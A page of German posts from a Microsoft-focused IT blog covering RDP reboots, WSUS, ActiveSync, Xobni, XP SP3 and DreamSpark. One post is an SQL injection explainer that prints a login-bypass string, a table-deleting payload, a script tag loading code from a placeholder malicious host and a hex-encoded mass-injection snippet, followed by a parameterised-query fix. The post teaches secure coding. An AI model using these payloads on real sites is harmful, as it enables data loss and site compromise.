atwork.blog

news and infos about microsoft, technology, cloud and more

Hotfix Installationen, Remote Desktop, Reboot - und keine Verbindung mehr

Schon einmal passiert? Man spielt über Remote Desktop die neuesten Windows Updates ein, macht einen Restart und vorbei ist es mit der Remote-Verbindung zum Rechner. _Sehr ärgerlich_ Vor allem mutet dieses Verhalten wie ein Glücksspiel an: manchmal gehts, manchmal nicht. Glücklicherweise haben wir jetzt eine Erklärung und einen Workaround gefunden, damit wir dieses Verhalten vermeiden können. Im ausgezeichneten Askperf-Blog werden Ursache und Wirkung dieses Verhaltens beschrieben. Was passiert also: Man meldet sich via Remote Desktop bei einem Server an und verwendet dabei nicht den /console oder /admin Switch. Nach der Installation der Updates geht man über "Neu starten" (oder "Restart") dazu über, den Server neu zu starten. Leider startet der Server nicht wirklich neu. Wenn sich der Administrator nun neu verbinden möchte, geht es nicht. Um die Verbindung via RDP wieder zu ermöglichen, muss der Server nochmals neu gestartet werden - diesmal jedoch über die Konsole. Die häufigste Ursache für dieses Verhalten liegt darin, dass bei der Installation der Updates eine globale Variable für Terminal Services nicht gesetzt wurde. Nachdem wir uns nicht über die Konsole verbunden haben kann es passieren, dass ein Prozess das Herunterfahren abbricht (anstatt den Restart zu erzwingen). Wie können Sie dieses Verhalten unterbinden? Durch Verwendung von shutdown -r -f anstelle von Herunterfahren. Der Switch -r steht für Restart, der Switch -f für force. Damit wird also ein Restart in jedem Fall erzwungen. Achtung -f erzwingt den Restart wirklich und beendet alle Prozesse, die laufen! Durch Anmeldung via RDP mittels Verwendung von /console oder /admin. Biede Befehle tun das gleiche: sie verbinden sich in die Konsolensession des Administrators, wobei /admin der aktuellere Befehl ist (und /console in späteren Releases nicht mehr verfügbar sein wird). Beitrag von Martina Grom

Vista SP1 in WSUS 3.0 integrieren

Im WSUS Produkt-Team Blog gibt es jedoch eine recht feine Anleitung, wie man das Vista SP1 in den WSUS importieren kann. Diese Anleitung habe ich gleich bei unserem WSUS angewendet und werde Sie hier noch einmal, mit ein paar Bildern, eingedeutscht darstellen: Zuerst muss auf WSUS Servern, die unter Windows Server 2003 laufen, das WinTrustVerify update eingespielt werden. Schritt 1: Sicherstellen, dass KB 938759 (siehe oben) installiert ist. Schritt 2: In der WSUS Admin Console zum Update Services Knoten navigieren. Schritt 3: Rechts Klicken und auf "Updates importieren" gehen. Damit öffnet sich der Microsoft Update Katalog. Schritt 4: Hier nach Vista SP1 suchen. Schritt 5: mit Hinzufügen die Vista Service Packs hinzufügen - je nach Geschmack gleich die für alle Sprachen oder die etwas kleinere Variante mit Deutsch, Englisch, etc. Schritt 6: Nachdem die Service Packs gewählt wurden, auf den Warenkorb klicken. Schritt 7: Mit Importieren die Auswahl bestätigen Beitrag von Martina Grom

Totgesagte leben länger - so auch SQL-Injection

Die guten alten Zeiten - da war alles noch einfacher. Oder doch nicht? Ich habe mal an einem größeren Shop-System programmiert - das war im Jahr 2000 - und dabei gelernt, dass man einige Dinge beachten muss: Funktionalität, Usability und ... Security. Ein SQL-Server-System ist ja eine feine Sache, aber es könnte dazu benutzt werden, um "bösen" SQL-Code abzusetzen - wenn man nicht ein paar grundlegende Dinge berücksichtigt. Die Bezeichnung "SQL-Injection" bedeutet, dass Eingaben (meist durch Webformulare oder präparierte URLs) um syntaktisch korrekte SQL-Befehle erweitert werden, sodass von Außen bösartiger Code eingeschleust werden kann, der Daten ändert oder löscht. Warum ist SQL Injection jetzt (noch) ein Thema? Es gab in den letzten Wochen und Monaten einige Mitteilungen, dass Systeme mit IIS und SQL Server durch SQL Injection verwundbar seien. Diese sind schlichtweg - falsch! Es handelt sich bei diesen Attacken nicht um Schwachstellen von Windows oder IIS oder SQL Server, sondern um Fehler von Software-Lieferanten oder Entwicklern. Damit Applikationen durch SQL Injection verwundbar sind, müssen die folgenden Voraussetzungen zutreffen: Websites und Applikationen, welche Classic ASP (oder auch PHP, od. ASPX) verwenden, die SQL Server (oder ähnliche SQL-Datenbanksysteme wie Oracle, MySQL, etc.) verwenden und SQL-Befehle ungefiltert zusammensetzen und ausführen (siehe Beispiel unten). Die Verantwortung für die Softwarelösungen liegt beim Entwickler selbst!Und hier herrscht leider immer noch viel zu wenig Focus von Software-Entwicklern im Bereich Security, denn sonst wären solche Attacken gegen Webseitensysteme nicht mehr erfolgreich! Wie funktioniert SQL-Injection? Auch darüber ist schon viel berichtet worden, hier ein einfaches Beispiel zur Funktionsweise. Angenommen, es gibt auf einer Webseite eine Login-Seite: Diese verwendet die Texteingaben ungefiltert und baut daraus einen SQL-String zusammen, welcher gegen die Datenbank abgesetzt wird: SELECT * FROM Users WHERE Username = 'max' and Password = 'geheim' Das schaut soweit ja fürs Erste funktionell aus - und als Ergebnis werden alle Datensätze mit diesem Filter geliefert - im Idealfall ein Datensatz mit dem User Max, wo sein Kennwort geheim ist. Max wird dann angemeldet und ... zurück zum Start! Ein findiger, böser Mensch kann nun folgendes versuchen: in der Annahme, dass die User-Abfrage so (oder ähnlich) funktioniert, kann er nun in die Textfelder folgendes schreiben: ' or '1'='1 und dasselbe beim Passwort. Was kommt beim Zusammensetzen des SQL-Befehls in der Login-Seite raus? SELECT * FROM Users WHERE Username = '' or '1'='1' and Password = '' or '1'='1' Die Texteingaben werden in das SQL eingesetzt und liefern somit immer WAHR. Und was liefert diese Abfrage? ALLE Benutzer aus der Users-Tabelle. Das bedeutet zum Beispiel, dass (bei einer Login-Seite) der anonyme Benutzer gleich als erster User in der Tabelle angemeldet wird. Blöd. Noch blöder: Wenn der Angreifer sich nicht damit begnügt, sondern dahinter noch ein böses SQL absetzt: 1'='1';DELETE FROM Users; Ganz schlecht. Damit wird beim Ausführen der Abfrage die ganze Users-Tabelle gelöscht. Dumm gelaufen - für den Betreiber der Website. Optimierung von SQL Injection Eine weitere Variante - diese ist ganz aktuell aus einem Logfile einer Website entnommen, die mit SQL Injection bearbeitet wurde: Statt od. zusätzlich zur Bedingung wird ein Script eingesetzt, welches aufgerufen wird, wenn die Tabelle ausgelesen und in einer Website angezeigt wird: <script src="http://www.---boeseseite---.com/b.js"></script> Und hier drinnen gehts dann mit Javascript weiter... die aufrufende Seite wird zur Umleitung oder (im besten Fall) unbrauchbar. Suchen Sie mal im Web nach "banner82.com" oder "adw95.com" - dann finden Sie ziemlich viele (auch prominente) Websites, die durch die aktuellen SQL-Injection-Angriffe "ge-hackt" wurden und diese Scripts intus haben oder hatten. Hier ein Beispiel, wie so eine infizierte Seite dann aussehen kann: Hier sind viele Attacken ausgeführt worden, sodass das Script mehrfach injiziert wurde und teilweise wieder unbrauchbar wird. Noch ein Hinweis zu banner82: Diese Attacke wird nicht ganz im Klartext injiziert, sondern kommt in etwa so daher: DECLARE @S%20VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641 ..... 6F7220 AS VARCHAR(4000)); EXEC(@S) Das SQL wird in einer Variable zusammengebastelt, lädt alle Tabellen und Spaltennamen in einer Schleife und versucht, das Script überall hineinzuschreiben und wird am Schluss mit EXECute ausgeführt. Eine weitere Steigerung: Mittlerweile ist es nicht mehr so, dass ein Hacker manuell versucht, in die Datenbank einer Website zu einzudringen, sondern die Angriffe werden automatisiert. Dazu bietet sich zum Beispiel an, ein API von Google od. einer anderen Suchmaschine zu benutzen: Suche alle Sites, wo Parameter (z.B. http://www.--eineseite--/article?id=xyz) übergeben werden.Versuche, an den Parameter ein ' anzufügen.Analysiere die Response der Seite, ob der gesendete Parameter korrektes Encoding besitzt. Wenn nein, dann ist die Website "offen" und ein Kandidat für SQL-Injection-Scripts! Schutz vor SQL Injection Die Lösung: Es gibt für alle Entwickler eine einfache Regel: All input is evil! Jede Eingabe muss vom Programm gefiltert oder kontrolliert werden. Das bedeutet: Keine SQL-Befehle mehr aus Eingabefeldern zusammensetzen. Auch schon in ADO (Classic ASP) gab es Parameter-Übergabe, natürlich auch in ASP.NET. Diese verhindert, dass Texteingaben ungültige Zeichen enthalten und somit bösartige SQL-Befehle ausführen können! Aus der Demo-Abfrage von oben wird: select TOP (1) UserID from Users where username = @username and password = @password und @username und @password werden als Parameter übergeben. In ASP.NET 2.0 (VB.NET) sieht das dann beispielsweise so aus: Dim conn As SqlConnectionDim cmd As New SqlCommandconn = New SqlConnection(ConnectionStrings("conn").ConnectionString)conn.Open()cmd = New SqlCommand(SQL, conn)cmd.CommandType = CommandType.Text ' od besser: .StoredProcedurecmd.Parameters.AddWithValue("@username", Me.txtUsername.Text)cmd.Parameters.AddWithValue("@password", Me.txtPassword.Text)UserID = cmd.ExecuteScalar()conn.Close() und schon hat SQL-Injection dank der Parameter-Übergabe keine Chance mehr. Das Ganze noch in einen Try..Catch Block, mit etwas Fehlerabsicherung versehen und man hat sauberen, sicheren Code (Hardcore-Entwickler mögen mir verzeihen - ich weiß, der Code kann effizienter formuliert werden aber das Beispiel dient nur zur Demonstration). Ziel dieses Artikels ist, das Bewußtsein zu diesem (eigentlich sehr alten) Thema zu fördern, die Funktionsweise zu demonstrieren und Entwickler anzuhalten, ihre Software sicher zu programmieren, damit keine mißbräuchliche Verwendung von öffentlich zugänglichen Webseiten möglich ist. Es gibt dazu eine Fülle von Anleitungen und Hilfen. Viel mehr zu diesem Thema und weitere Hilfestellung, wie man sich davor schützen kann, finden Sie in den folgenden Links: http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx - Microsoft´s call to action und weitere Infos: http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx - Scott Guthrie´s blog http://msdn.microsoft.com/en-us/library/ms998271.aspx - msdn: How To: Protect From SQL Injection in ASP.NET http://msdn.microsoft.com/en-us/library/bb671351.aspx - msdn: Explained - SQL Injection http://technet.microsoft.com/de-de/library/ms161953.aspx - technet: SQL Injection http://msdn.microsoft.com/en-us/library/aa224806.aspx  - Injection Protection Achja, es gibt natürlich auch zum Thema Programmieren im Internet einige weitere interessante Security-Themen: SQL Cross Site Scripting, Canonicalization Attacks (wußten Sie, wie viele Arten es gibt, eine URL anzugeben, zum Beispiel auch dezimal), Query String, Form, Cookie, HTTP Header-Manipulations und vieles mehr. Internet-Technologie ist toll, aber bietet eine Reihe von Angriffsmöglichkeiten. Bei Tauchern heißt der Abschiedsgruß "Gut Luft". Bei Entwicklern sollte es heißen "Secure coding"! ;-) Beitrag von Toni Pohl

Active Sync encountered a problem on the server. Support code: 0x86000108

Wer Active Sync kennt und nutzt, wird es nicht mehr missen wollen. Seit Exchange 2003 nutze ich diese Möglichkeit mit Begeisterung. Seit SP2 von Exchange 2003 nutze ich auch die Push-E-Mail Funktion. Zu schön ist es, bei jeder roten Ampel mal schnell zu sehen, ob es neue E-Mails gibt. Besonders reizvoll ist der Umstand, dass es in meiner unmittelbaren Umgebung mittlerweile jeder tut - extrem Kommunikativ, wenn man ständig sein Handy beobachtet, ob eine neue E-Mail gekommen ist. ;-) Aber genug der Schwärmerei, es gibt auch manchmal Tücken, die Active Sync verhindern, von einer solchen möchte ich heute berichten: Vor einiger Zeit haben wir einen Microsoft Office Sharepoint Portal Server 2007 (MOSS) in Betrieb genommen. Wir verwalten in diesem unter anderem eine ToDo List, wo jedes Team-Mitglied seine Aufgaben einträgt (oder wo diese eingetragen werden). Wie ich es nun von WSS 2.0 bereits gewohnt war, habe ich mir für diese Liste nun eine Benachrichtigung (Alert) gesetzt, damit ich eine tägliche Info per E-Mail erhalten, wenn sich etwas geändert hat. Toll sieht sie aus, diese Benachrichtigung. Ich habe sie mir so eingestellt, dass sie täglich versendet wird, also meist so gegen 19:00 Uhr. Am nächsten Morgen jedoch: kein ActiveSync. Sondern nur die knappe Fehlermeldung auf meinem Handy: Active Sync konnte nicht ausgeführt werden, Unterstützungscode: 0x86000108. Des Rätsels Lösung in diesem Fall ist (leider), dass die Benachrichtigung von SharePoint, wenn an eine Exchange 2003 Mailbox geliefert, weitere Synchronisationen verhindert. Dies gilt allerdings nur für jene Ordner, die tatsächlich synchronisiert werden. Die Ursache liegt darin, dass der Benachrichtigungstyp von IPM.note auf IPM.sharing geändert wird. Exchange unterstützt diesen Benachrichtigungstyp jedoch nicht. Microsoft stellt jedoch einen Hotfix zur Behebung dieses Problems zur Verfügung: Knowledgebase Artikel 937788 Nähere Informationen zu den Benachrichtigungstypen finden sich hier. Übrigens: es hat bei mir leider nicht gereicht, einfach nur mit einer Outlook Regel diese Messages in einen anderen Ordner zu verschieben. Beitrag von Martina Grom

Was kommt raus, wenn man die Outlook &quot;Inbox&quot; umdreht?

Die Antwort ist verblüffend einfach: "Xobni" (sprich "Zob-ni"). So nennt sich eine amerikanische Mini-Firma aus San Francisco, bestehend aus einer Handvoll Jung-Zwanzigern, die ein cooles PlugIn für Microsoft Outlook entwickelt haben. Was kann das PlugIn? Xobni installiert ein eigenes Panel in Outlook und spart Zeit, indem es emails, Kontakte und Attachments indiziert, in Verbindung setzt und eine schnelle Suche darauf ermöglicht. Was ist das Besondere an Xobni? Nun, zunächst einmal hat sogar Bill Gates das Tool Xobni als "the next generation of social networking" bezeichnet.Warum? Weil Xobni für jede E-Mail, jedes Attachment und jede Person ein Profil erstellt und diese Informationen in Beziehungen umsetzt. Das wiederum ist Basis für die schnelle und umfangreiche Suche in einer aufgeräumten Microsoft-konformen Oberfläche. Das PlugIn läuft unter Windows XP oder Windows Vista mit Office 2003 und Office 2007 und benötigt das Microsoft .NET Framework 2.0 oder höher. Alle System-Voraussetzungen finden sich in den FAQs. Für den persönlichen Gebrauch ist Xobni gratis. Der Download ist hier zu finden. Die Installation erfolgt mit ein paar Klicks in gewohnter Next-Next-Finish-Manier. Beim ersten Starten von Outlook beginnt das erstmalige Indizieren.   Also gleich mal downloaden und ausprobieren...(Dummerweise bin ich gerade über VPN, einem anderen User-Profil und im Nicht-Cached-Modus mit meinem Exchange-Server verbunden - das dauert natürlich... aber nach etwa 15 Minuten waren meine 6000 mails auch über die langsame ADSL-Leitung geladen und indiziert.) Nun, hier mal der Überblick über die Funktionalität: Während Xobni mein Postfach indiziert bin ich gerade begeistert, dass auch Statistiken erzeugt werden: Ich antworte meinem Kontakt "Herbert" durchschnittlich innerhalb von 6 Minuten auf seine E-Mails - das ist meine beste durchschnittliche Antwortzeit - nicht wirklich wichtig, aber interessant! Beim Indizieren sucht das Tool auch nach den Kontaktdaten der E-Mail Absender und Sender, extrahiert gleich deren Kommunikationsdaten und es werden die Statistiken erzeugt. So, fertig indiziert macht die Verwendung schon richtig Spaß.Das Xobni-Panel integriert sich in Outlook.So sieht´s aus. Bemerkenswert: Xobni versucht, Telefonnummern nicht nur von den eigenen Kontakten, sondern auch aus dem E-Mail-Body und E-Mail Signaturen zu lesen und zum Profil hinzuzufügen!Das Quickinfo auf die Telefonnummer zeigt, von wo die Telefonnummer ermittelt wurde. Was mir sehr gut gefällt: es ist sofort in der Statistik ersichtlich, wie viele E-Mails an den Kontakt gesendet (hier: OUT 34) und vom Kontakt empfangen wurden (hier: IN 102) wurden, und auch zu welchen Zeiten mit dem Kontakt kommuniziert wird (hier: zu den üblichen Büro-Arbeitszeiten, mit Spitzen um die Mittagszeit).Nebenbei gibt´s auch noch einen Rang (hier: Rank: #10) - wohl gereiht nach Anzahl der E-Mails. In der Gruppe xy´s  Network sind alle Kontakte der angezeigten Person sichtbar - und klickbar. Hier kann man sich schön "durchklicken" und so von Kontakt zu Kontakt springen wie im Screenshot oben: Gregor - Martin - Franz - Bernd - usw.   Beim Öffnen der "Conversations" - also der E-Mails - gibt´s einen hilfreichen Schieberegler, der die Größe der angezeigten E-Mai-Inhalte steuert. Praktisch!Das Gute dabei: Nachdem Xobni ein eigens Panel in Outlook öffnet, ist die Original-Nachricht in der Outlook-Vorschau immer sichtbar. Somit kann man sich leicht darauf beziehen oder Inhalte kopieren.Der Back-Button zeigt wie gewohnt einfach jeweils die vorige Seite an. Fürs Handling sehr praktisch. Conversations öffnet die markierte E-Mail und zeigt gleich Links zum Ansehen, Antworten etc. Sehr hilfreich: Keine Suche nach Attachments mehr!Im Panel unterhalb der Conversations werden automatisch alle Attachments in einer Liste angezeigt. Die Suche in Xobni funktioniert - wie in Outlook selbst - erwartungsgemäß schnell während der Eingabe. Last but not least: Analytics - Statistik auf Knopfdruck.Hier muss man sich durchklicken - so umfangreich werden die E-Mail und Kontakt-Zahlen auf Tag, Woche, Monat, Jahr sowie die Durchschnittswerte berechnet und dargestellt.Nun gibt´s eine Statistik über meinen E-Mail-Verkehr. Auch ganz hübsch: das eingeklappte Xobni-Panel mit Überblick über das Postfach bzw. den aktuellen Ordner.Ein kleiner Wehrmutstropfen: Das Xobni-Panel selbst kann im geöffneten Zustand nicht mehr verschmälert werden. Ein Widescreen macht (aber generell auch bei Outlook) Sinn ;-) Links: www.xobni.com Auch die New York Times berichtet über Xobni Suche nach Beziehungen im blog von Thomas Lutz Hands-on with Xobni: make Outlook more productive, social softundtippsblog.lutz-nelde.de Fazit: Für intensive Outlook-Benutzer - und wer ist das nicht ;-) - ein interessantes PlugIn, das wert ist, angeschaut zu werden: . Viel Spaß! Beitrag von Toni Pohl

Microsoft Patchday und Security Bulletins

Wahrscheinlich ist nur wenigen Administratoren bekannt, dass es im Microsoft TechNet eine Reihe von Informationen und Services gibt, welche über Patches, gestopfte Sicherheitslücken, Tools und Empfehlungen berichten. Das wird hiermit nachgeholt. ;-) Im Thema Sicherheit findet sich die Einstiegsseite Security Bulletin-Suche. Hier findet sich beispielsweise auch der Bulletin vom Mai 2008 - diesmal wurden drei als kritische Sicherheitslöcher und eines als mittleres Sicherheitsloch eingestuft und behoben. Empfehlenswert für System-Admins ist auch der Microsoft Security Bulletins RSS-Feed. Für Betreiber von MU, WU und WSUS finden sich in KB894199 Informationen über Änderungen dieser Dienste im Jahr 2008. Links: http://www.microsoft.com/germany/technet/sicherheit/bulletins/aktuell/default.mspx - Start http://www.microsoft.com/germany/technet/sicherheit/bulletins/ms08-may.mspx - aktuell im Mai http://www.microsoft.com/germany/technet/sicherheit/bulletins/secrss.xml - der RSS-Feed http://support.microsoft.com/kb/894199 - MU, WU und WSUS Änderungen 2008 http://www.microsoft.com/germany/technet/sicherheit/default.mspx - Allgemeine Infos zum Them Sicherheit mit Tools zum Netzwerk-Schutz Beitrag von Toni Pohl

Windows XP SP3 ist (offiziell) da!

Es hätte eigentlich schon bis Ende April veröffentlicht werden sollen - aber nun ist es wirklich da: Das "letzte" Service-Pack für Windows XP: ServicePack 3. Grund für die Verzögerung waren Kompatibilitätsprobleme mit dem eigenen Microsoft Dynamics Produkten. Diese wurden in SP3 nun behoben. Das Whitepaper Windows XP Service Pack 3 Overview informiert über die Neuerungen. Enthalten sind u.a. Security-Patches für Web und Office-Applikationen. Es wurde die Produktaktivierung von Windows Vista und Windows Server 2003 SP2 hinzugefügt. Windows XP kann jetzt ohne Produktschlüssel installiert werden und für einen begrenzten Zeitraum laufen. Der Produktschlüssel kann dann später durch das "Genuine Advantage-Programm" eingegeben werden. Windows XP SP3 stellt auch sicher, dass alle verfügbaren Updates installiert sind und darüber hinaus einige neue Fähigkeiten von Windows Server 2008 genutzt werden können, wie etwa der Netzwerkzugriffsschutz Network Access Protection (NAP). Auch wurde Wi-Fi Protected Access 2 Unterstützung (WPA2) hinzugefügt. Durch das Peer Name Resolution Protocol 2.1 können XP-Computer über PNRP mit Vista-Rechnern kommunizieren, RDP 6.1 wird hinzugefügt. Neu kommen auch MMC 3.0, Windows Installer 3.1 sowie einige Verbesserungen in BITS 2.5, IPSec, Kryptografiemodulen und weitere Updates hinzu. IE7 ist nicht standardmäßig enthalten und als Update zum Download verfügbar. Windows XP Service Pack 3 enthält alle zuvor veröffentlichten Windows XP-Updates, einschließlich Sicherheitsupdates und Hotfixes. Hier gehts zum Download für x86 Systeme (etwa 313MB): Windows XP Service Pack 3  Beitrag von Toni Pohl

Ganz frisch: Live Mesh gestartet

Microsoft´s neue Vision lautet: Web-basierende Anwendungen für Unternehmen und für Consumer zu entwickeln: Ein Software- und Data-Storage-System namens Live Mesh! Ray Ozzie leitet mit Live Mesh (derzeit noch als TechPreview für Beta-Tester) den Abschied von konventioneller Software hin zu Web 2.0 Anwendungen in Microsofts Firmengeschichte ein.

DreamSpark - Professionelle Software f&uuml;r Studenten

channel8 hat was Cooles zu vermelden: Mit dem Microsoft DreamSpark-Programm können Studenten professionelle Developer und Designer Tools gratis verwenden! Studenten erhalten somit die Möglichkeit, sich fortzubilden, einzuarbeiten und jene Software-Produkte kennen zu lernen, die sie vielleicht in ihrem späteren Berufsleben verwenden werden.   DreamSpark beinhaltet Produkte der Microsoft Visual Studio Edition, Expression Studio, SQL Server und Windows Server. Es handelt sich dabei nicht um Beta- oder Testversionen, sondern um die vollen Produkte unter der DreamSpark-Lizenz. Ein kleiner Wehrmutstropfen: Derzeit ist das Programm noch nicht in Österreich erhältlich, sondern erst in den folgenden elf Staaten: USA, Großbritannien, Kanada, China, Deutschland, Frankreich, Finnland, Spanien, Schweden, Schweiz und Belgien. Die gute Nachricht: DreamSpark wird erweitert und das Programm wird 2009 weltweit verfügbar sein! Wie funktioniert DreamSpark?Man muss Schüler oder Student sein und benötigt eine Windows Live ID. Nach Auswahl der Ausbildungsstätte wird eine Validierung der Daten durch die (Hoch)Schule bzw. durch die Studenten-ID und dem Provider der Schule/Organisation durchgeführt. Der Studenten-Status muss nach jeweils einem Jahr innerhalb des DreamSpark-Programms online erneuert werden. Nach Validierung können die Software-Produkte downgeloadet und installiert werden. Jeder Student erhält einen Single-Use-Single-Activation product-key zur einmaligen Installation. Hier die in DreamSparks verfügbaren Produkte: Visual Studio 2008 Professional Edition Visual Studio 2005 Professional Edition Expression Studio (includes Web, Blend, Media and Design) SQL Server 2005 Developer Edition Windows Server 2003 R2 Standard Edition, with SP2 Noch ein Hinweis für alle Nicht-Studenten: Die folgenden Microsoft-Produkte sind frei einsetzbar: SQL Server 2005 Express Edition Visual Studio 2005 Express Edition XNA Game Studio 2.0 (with 12-month Creators Club trial membership) Virtual PC Hier geht´s zur DreamSpark-Website und den FAQs. Beitrag von Toni Pohl

Microsoft Surface kommt

Martina hat schon über Microsoft Surface im August 2007 gebloggt. Nun ist es anscheinend soweit: Surface gibt´s wirklich - zumindestens in den USA. Schaut fesch aus, so ein PC mit Touch-Interface im Tisch eingebaut. Mehrere Kameras registrieren die Bewegungen auf der 30-Zoll Tischoberfläche und setzen diese um, sodass ein Eindruck wie beim Hantieren mit echten Gegenständen entsteht. Bilder davon gibts auch im Web-Standard hier. Zunächst wird Surface wohl im Handel und in öffentlichen Gebäuden zum Einsatz kommen, für Consumer wird Surface voraussichtlich erst ab 2011 verfügbar sein. Mehr Produkt-Infos, Videos und das Blog des Produkt-Teams gibt´s direkt auf der Microsoft Surface Site.

Windows XP - Der Zeitplan bis 2008 und Windows 7

Totgesagte leben länger. So oder so ähnlich könnte man den Zeitplan beurteilen, den Microsoft für sein Betriebssystem Windows XP (erschienen 2001) vorlegt: Das Verkaufsende von Windows XP ist mit diesem Sommer 2008 geplant, wobei XP Home voraussichtlich noch bis Mitte 2010 für Hersteller von Billig-PCs verkauft wird. Oder bis 1 Jahr nach Windows Version 7 (geplant übrigens auch für 2010, siehe auch hier) - dem Nachfolger von Windows Vista. Mehr dazu im Web-Standard hier.

Vorschau auf die Big&gt; Days 2008

Die letzten beiden Wochen durfte ich bei zwei Rehearsals zu den Big> Days 2008 teilnehmen. Einmal ging es um ein Developer Thema (Freude, Freude), das zweite Rehearsal war nicht minder interessant: Infrastruktur und hier im speziellen Virtualisierung. Wofür Rehearsals? Bei den Rehearsals zu den Big> Days 2008 geht es darum, dass eine Reihe von potentiellen Zuhörern einen Vortrag hinsichtlich Inhalt, Verständlichkeit, Dramaturgie etc. prüfen. Zusätzlich stellt das Rehearsal eine Art Feuerprobe für die technischen Anforderungen dar. Und die sind gar nicht ohne. Ohne nicht mindestens zwei virtuelle Maschinen dabei zu haben, läuft ja mittlerweile gar nichts mehr. Leider ging es sich bei mir zeitlich nicht aus, bei mehreren der Rehearsals anwesend zu sein, aber was ich gehört habe: alle Achtung! Die Big> Days 2008 bieten dieses Jahr eine ganze Menge Neuerungen im Server- und Entwicklungsbereich. Aber nun eine kleine Vorschau der beiden Tracks, die ich mir angehört habe: 1. 10 Tipps für Applikationen mit SQL Server 2008Andreas Könighofer und Andreas Rynes stellen hier 10 Neuerungen in SQL 2008 vor, mit denen Developer (Entwickler) effizienter arbeiten werden können. Lustig im Rehearsal war insbesondere die "Eindeutschung" aller Begriffe. Ein Highlight: Geospatialdaten (Geo-Spatial Integration). Die beiden Andreas haben da eine Menge guter News - sehr empfehlenswert! 2. Virtualisierung ist mehr als nur Server-Virtualisierung Klaus Kremser, und mein Blog-Kollege Peter Forster werden einen sehr umfassenden Blick zu den Virtualiserungsthemen bieten, das Spektrum reicht von Softgrid bis zu Hyper-V. Wie Sie ja von diesem Blog schon wissen, handelt es sich bei Peter Forster um den Spezialisten zur Virtualisierung, er freut sich schon besonders auf seine ersten Big> Days!   Ich hoffe, Sie nehmen sich dieses Jahr auch wieder die Zeit, um bei den Big> Days 2008 vorbei zu schauen! See you there, äehm: wir sehen uns dort! Beitrag von Martina Grom